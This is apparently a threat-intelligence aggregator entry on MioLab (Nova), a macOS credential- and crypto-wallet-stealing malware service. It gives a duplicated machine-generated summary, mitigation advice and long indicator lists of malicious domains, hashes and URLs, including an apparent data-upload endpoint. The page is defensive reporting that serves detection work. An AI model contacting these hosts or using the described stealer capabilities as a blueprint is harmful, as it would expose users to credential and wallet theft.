“Say My Name”: How MioLab is building MacOS Stealer Empire
MioLab is a Malware-as-a-Service platform targeting macOS systems, specializing in stealing sensitive data such as browser credentials and cryptocurrency wallet information. It supports a wide range of wallet extensions and desktop wallets, including modules to intercept recovery seed phrases from Ledger and Trezor hardware wallets. The malware payload is lightweight, compatible with both Intel and Apple Silicon Macs, and supports macOS versions from Sierra to Tahoe. MioLab uses sophisticated social engineering techniques, including customizable DMG installers with fake system prompts and integration with ClickFix. Recent updates have added capabilities like Safari cookie theft and Apple Notes decryption. The operation leverages bulletproof hosting and is actively developed, but no known exploits in the wild have been reported. No official patches or vendor advisories are available for this threat.
AI Analysis
Technical Summary
MioLab (also known as Nova) is a sophisticated macOS-focused Malware-as-a-Service platform advertised on Russian-speaking underground forums. It features extensive data exfiltration capabilities targeting browser credentials and cryptocurrency wallets, supporting over 200 browser extensions and 50+ desktop wallets. A premium module targets Ledger and Trezor hardware wallets by intercepting 24-word BIP39 recovery seed phrases. The malware payload is written in C, lightweight, and compatible with Intel and Apple Silicon architectures across macOS Sierra to Tahoe. It employs advanced social engineering via customizable DMG builders with live previews, fake system prompts, and ClickFix integration. Recent enhancements include Safari cookie grabbing, automated Apple Notes decryption, and universal hardware wallet modules. The infrastructure uses bulletproof hosting services and shares components with other malware families. There are no known public exploits or patches available.
Potential Impact
MioLab enables attackers to steal sensitive user data on macOS systems, including browser credentials and cryptocurrency wallet information, potentially leading to financial theft and account compromise. The ability to intercept hardware wallet recovery phrases significantly increases the risk to users relying on Ledger and Trezor devices. The malware's compatibility with multiple macOS versions and architectures broadens its potential victim base. While no known exploits in the wild have been reported, the platform's active development and extensive capabilities pose a medium-level threat to macOS users, especially those involved in cryptocurrency.
Mitigation Recommendations
There is no official patch or vendor advisory available for this threat. Users should exercise caution when opening unsolicited or suspicious DMG files, especially those received via social engineering channels. Employing endpoint protection solutions capable of detecting macOS malware and monitoring for unusual activity related to browser credentials and wallet access is recommended. Given the lack of official fixes, vigilance and user education are critical. Regular backups and use of hardware wallets with strong physical security measures can help mitigate potential losses.
Indicators of Compromise
- domain: http.host
- domain: marinemember.com
- domain: officerelaxation.com
- domain: approve-me.com
- domain: decodecybercrime.com
- domain: mioisiskwowiwjowuwjwolab.club
- domain: zynce.org
- hash: 2422f04227fa86a149aed35d82f9a7fc
- domain: playavalon.org
- domain: socifiapp.com
- hash: 5c1cd6b18d9cdb7a682560518f0438cc
- hash: c8678739a0301fc2a46bbc7ed8629386
- url: https://socifiapp.com/api/reports/upload
- domain: command-confirm.com
- domain: approvecommand.com
- hash: 581f43161c591c43a3beb6d8e65b091a
- hash: 822c45a52cad26af77ea25f121724999
- hash: eeaba83f9e5a3922b02ba178c4ae445e
- hash: 138077b20c1886d0057983648c83deff9542a3cd
- hash: 65c1d23ca72d3699a382632db132352784999ab8
- hash: a8bb4b2c94187c91cd2cf62b23c2732625daff70
- hash: 1b38274f279c7c9aa8d45ac028b33bbf25861d706d10ecf017aa502a216cafbb
- hash: 2551e64498ed723fa2b258c9134ee299308ef91c82e14b9e873fc06dddb8f3f4
- hash: a24c82c2c4db20baef8998cb3c4935b74e83fec1a6c0e6bfcc64f4af19507b9c
- url: http://mioisiskwowiwjowuwjwolab.club/login
- url: https://bruceketta.space/posts/nova-script-251110/
- url: https://decodecybercrime.com/mapping-defhost-an-investigation-into-femo-it-solutions-limited-as214351/
- url: https://socifiapp.com
- domain: adjustservices.com
- domain: approvalmechanism.com
- domain: automatic-approval.com
- domain: blindsettlement.com
- domain: bothnationaldomainzones.com
- domain: bruceketta.space
- domain: bucketowlsummary.com
- domain: captainnose.com
- domain: carrotvegetable.com
- domain: certainstoragefeel.com
- domain: charitydome.com
- domain: chopaquarium.com
- domain: command-distributor.com
- domain: commerceapprove.com
- domain: confirm-protocol.com
- domain: cucumbernonsense.com
- domain: decline.top
- domain: displacehaircut.com
- domain: establishtransmission.com
- domain: flexiblefinger.com
- domain: formalpyramid.com
- domain: frontbottle.com
- domain: frozenlilytaxi.com
- domain: horsemanufacturer.com
- domain: importantsquash.com
- domain: insightvariety.com
- domain: itemvalidation.com
- domain: macosdev.world
- domain: memorialapetite.com
- domain: ovalresponsibility.com
- domain: owqkoqoqoqoqoqqoqoo.info
- domain: peaceofmindzone.com
- domain: registrationprotocol.com
- domain: respectableneedle.com
- domain: revisemodule.com
- domain: rocqwkeorkcowqkrcw.icu
- domain: sculpturecherry.com
- domain: signaturemodule.com
- domain: singleenvironment.com
- domain: standardpoetry.com
- domain: stringmotivation.com
- domain: structurecarry.com
- domain: sunrisefootball.com
- domain: talentedfrog.com
- domain: technicalposition.com
- domain: terminalconfirm.com
- domain: terminalsignature.com
- domain: trackperformer.com
- domain: usefuldrum.com
- domain: weetspace.com
- domain: welldrawer.com
- domain: wheelchairmoments.com
- domain: wtkqwctkow.icu
- hash: 32c135068c2070c7821f7c7a325ab1350cc207bfba978cdc1c6f5ba0bae46e4e
- hash: b18632cfdd732953bd5e13baba3bf11c84cc37f9
- hash: 521d6be1f630f4f8b21d57d1284b68ecc8fc9ad3
- hash: 2c54e32bde2960344f0270c76c9616741c2947b6f3311424b8220d8c95c3664f
“Say My Name”: How MioLab is building MacOS Stealer Empire
Description
MioLab is a Malware-as-a-Service platform targeting macOS systems, specializing in stealing sensitive data such as browser credentials and cryptocurrency wallet information. It supports a wide range of wallet extensions and desktop wallets, including modules to intercept recovery seed phrases from Ledger and Trezor hardware wallets. The malware payload is lightweight, compatible with both Intel and Apple Silicon Macs, and supports macOS versions from Sierra to Tahoe. MioLab uses sophisticated social engineering techniques, including customizable DMG installers with fake system prompts and integration with ClickFix. Recent updates have added capabilities like Safari cookie theft and Apple Notes decryption. The operation leverages bulletproof hosting and is actively developed, but no known exploits in the wild have been reported. No official patches or vendor advisories are available for this threat.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
MioLab (also known as Nova) is a sophisticated macOS-focused Malware-as-a-Service platform advertised on Russian-speaking underground forums. It features extensive data exfiltration capabilities targeting browser credentials and cryptocurrency wallets, supporting over 200 browser extensions and 50+ desktop wallets. A premium module targets Ledger and Trezor hardware wallets by intercepting 24-word BIP39 recovery seed phrases. The malware payload is written in C, lightweight, and compatible with Intel and Apple Silicon architectures across macOS Sierra to Tahoe. It employs advanced social engineering via customizable DMG builders with live previews, fake system prompts, and ClickFix integration. Recent enhancements include Safari cookie grabbing, automated Apple Notes decryption, and universal hardware wallet modules. The infrastructure uses bulletproof hosting services and shares components with other malware families. There are no known public exploits or patches available.
Potential Impact
MioLab enables attackers to steal sensitive user data on macOS systems, including browser credentials and cryptocurrency wallet information, potentially leading to financial theft and account compromise. The ability to intercept hardware wallet recovery phrases significantly increases the risk to users relying on Ledger and Trezor devices. The malware's compatibility with multiple macOS versions and architectures broadens its potential victim base. While no known exploits in the wild have been reported, the platform's active development and extensive capabilities pose a medium-level threat to macOS users, especially those involved in cryptocurrency.
Mitigation Recommendations
There is no official patch or vendor advisory available for this threat. Users should exercise caution when opening unsolicited or suspicious DMG files, especially those received via social engineering channels. Employing endpoint protection solutions capable of detecting macOS malware and monitoring for unusual activity related to browser credentials and wallet access is recommended. Given the lack of official fixes, vigilance and user education are critical. Regular backups and use of hardware wallets with strong physical security measures can help mitigate potential losses.
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- ["https://www.levelblue.com/blogs/spiderlabs-blog/say-my-name-how-miolab-is-building-macos-stealer-empire"]
- Adversary
- MioLab
- Pulse Id
- 69f3653e884ec7a430371ba3
- Threat Score
- null
Indicators of Compromise
Domain
| Value | Description | Copy |
|---|---|---|
domainhttp.host | — | |
domainmarinemember.com | — | |
domainofficerelaxation.com | — | |
domainapprove-me.com | — | |
domaindecodecybercrime.com | — | |
domainmioisiskwowiwjowuwjwolab.club | — | |
domainzynce.org | — | |
domainplayavalon.org | — | |
domainsocifiapp.com | — | |
domaincommand-confirm.com | — | |
domainapprovecommand.com | — | |
domainadjustservices.com | — | |
domainapprovalmechanism.com | — | |
domainautomatic-approval.com | — | |
domainblindsettlement.com | — | |
domainbothnationaldomainzones.com | — | |
domainbruceketta.space | — | |
domainbucketowlsummary.com | — | |
domaincaptainnose.com | — | |
domaincarrotvegetable.com | — | |
domaincertainstoragefeel.com | — | |
domaincharitydome.com | — | |
domainchopaquarium.com | — | |
domaincommand-distributor.com | — | |
domaincommerceapprove.com | — | |
domainconfirm-protocol.com | — | |
domaincucumbernonsense.com | — | |
domaindecline.top | — | |
domaindisplacehaircut.com | — | |
domainestablishtransmission.com | — | |
domainflexiblefinger.com | — | |
domainformalpyramid.com | — | |
domainfrontbottle.com | — | |
domainfrozenlilytaxi.com | — | |
domainhorsemanufacturer.com | — | |
domainimportantsquash.com | — | |
domaininsightvariety.com | — | |
domainitemvalidation.com | — | |
domainmacosdev.world | — | |
domainmemorialapetite.com | — | |
domainovalresponsibility.com | — | |
domainowqkoqoqoqoqoqqoqoo.info | — | |
domainpeaceofmindzone.com | — | |
domainregistrationprotocol.com | — | |
domainrespectableneedle.com | — | |
domainrevisemodule.com | — | |
domainrocqwkeorkcowqkrcw.icu | — | |
domainsculpturecherry.com | — | |
domainsignaturemodule.com | — | |
domainsingleenvironment.com | — | |
domainstandardpoetry.com | — | |
domainstringmotivation.com | — | |
domainstructurecarry.com | — | |
domainsunrisefootball.com | — | |
domaintalentedfrog.com | — | |
domaintechnicalposition.com | — | |
domainterminalconfirm.com | — | |
domainterminalsignature.com | — | |
domaintrackperformer.com | — | |
domainusefuldrum.com | — | |
domainweetspace.com | — | |
domainwelldrawer.com | — | |
domainwheelchairmoments.com | — | |
domainwtkqwctkow.icu | — |
Hash
| Value | Description | Copy |
|---|---|---|
hash2422f04227fa86a149aed35d82f9a7fc | — | |
hash5c1cd6b18d9cdb7a682560518f0438cc | — | |
hashc8678739a0301fc2a46bbc7ed8629386 | — | |
hash581f43161c591c43a3beb6d8e65b091a | — | |
hash822c45a52cad26af77ea25f121724999 | — | |
hasheeaba83f9e5a3922b02ba178c4ae445e | — | |
hash138077b20c1886d0057983648c83deff9542a3cd | — | |
hash65c1d23ca72d3699a382632db132352784999ab8 | — | |
hasha8bb4b2c94187c91cd2cf62b23c2732625daff70 | — | |
hash1b38274f279c7c9aa8d45ac028b33bbf25861d706d10ecf017aa502a216cafbb | — | |
hash2551e64498ed723fa2b258c9134ee299308ef91c82e14b9e873fc06dddb8f3f4 | — | |
hasha24c82c2c4db20baef8998cb3c4935b74e83fec1a6c0e6bfcc64f4af19507b9c | — | |
hash32c135068c2070c7821f7c7a325ab1350cc207bfba978cdc1c6f5ba0bae46e4e | — | |
hashb18632cfdd732953bd5e13baba3bf11c84cc37f9 | — | |
hash521d6be1f630f4f8b21d57d1284b68ecc8fc9ad3 | — | |
hash2c54e32bde2960344f0270c76c9616741c2947b6f3311424b8220d8c95c3664f | — |
Url
| Value | Description | Copy |
|---|---|---|
urlhttps://socifiapp.com/api/reports/upload | — | |
urlhttp://mioisiskwowiwjowuwjwolab.club/login | — | |
urlhttps://bruceketta.space/posts/nova-script-251110/ | — | |
urlhttps://decodecybercrime.com/mapping-defhost-an-investigation-into-femo-it-solutions-limited-as214351/ | — | |
urlhttps://socifiapp.com | — |
Threat ID: 69f884b6cbff5d861010660c
Added to database: 5/4/2026, 11:36:22 AM
Last enriched: 5/4/2026, 11:51:23 AM
Last updated: 5/4/2026, 1:39:47 PM
Views: 3
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.